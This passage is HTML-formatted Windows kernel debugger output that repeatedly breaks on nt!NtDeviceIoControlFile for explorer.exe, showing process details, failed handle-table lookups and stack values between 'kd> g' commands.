_HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6cc 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f64c 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000f79b8 00000120</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000de808 0000016c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000218 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f71c 0021009a 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00c9f6b8 0000003c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000218 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f7f8 0017003e 76477d3c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 0000003c 00c9f86c 000002d0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f784 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 01fc8008 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f500 00120003 00c9f5ac</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00168858 00000100</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 178 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 178 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f514 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 0018ad70 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier 